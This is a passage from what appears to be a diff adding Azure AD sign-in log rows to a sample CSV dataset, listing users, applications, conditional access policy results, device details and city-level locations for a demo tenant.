['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:00,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",c11e9a06-2ba1-4ef5-8630-074da0744000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c11e9a06-2ba1-4ef5-8630-074da0744000,SigninLogs,Sucess,35.01296997,-80.93171692
+1085,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:40.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:57,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",5613c330-85ea-47e9-a83a-42b78db94300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5613c330-85ea-47e9-a83a-42b78db94300,SigninLogs,Sucess,35.01296997,-80.93171692
+1086,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:06.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,52c87a36-e704-4414-a543-96fd7d0ea47e,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:48,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 83.0.471', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",20c66c98-b988-4bff-b971-b855bc383e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,20c66c98-b988-4bff-b971-b855bc383e00,SigninLogs,Sucess,35.01296997,-80.93171692
+1087,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:02.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8943fa32-b88f-4393-b236-0824e87bff95,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",f43e6c92-66fa-4147-92cb-4f3be7fe0b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f43e6c92-66fa-4147-92cb-4f3be7fe0b00,SigninLogs,Sucess,36.6404686,-78.26995087
+1088,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,09:53.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,61c1469f-80fb-0000-54e6-728b93444002,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:09,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5423bf62-9037-4448-bcaa-30335f640c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,5423bf62-9037-4448-bcaa-30335f640c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1089,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,11:32.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,76f314a3-2f28-4e18-8a6c-274880a9bcef,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:11,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",f81997e3-0b26-42cc-8532-c4ded9560e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,f81997e3-0b26-42cc-8532-c4ded9560e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1090,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:03.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,aff28126-cdfd-4279-9176-0e2c926de88f,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:00,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",71693871-d407-425c-bffa-acefa6550b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,71693871-d407-425c-bffa-acefa6550b00,SigninLogs,Sucess,41.90428925,-85.99833679
+1091,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:20.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:00,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",c11e9a06-2ba1-4ef5-8630-074da0744000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c11e9a06-2ba1-4ef5-8630-074da0744000,SigninLogs,Sucess,35.01296997,-80.93171692
+1092,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:37.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,06c1469f-1042-0000-5421-71f0e26a5b53,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 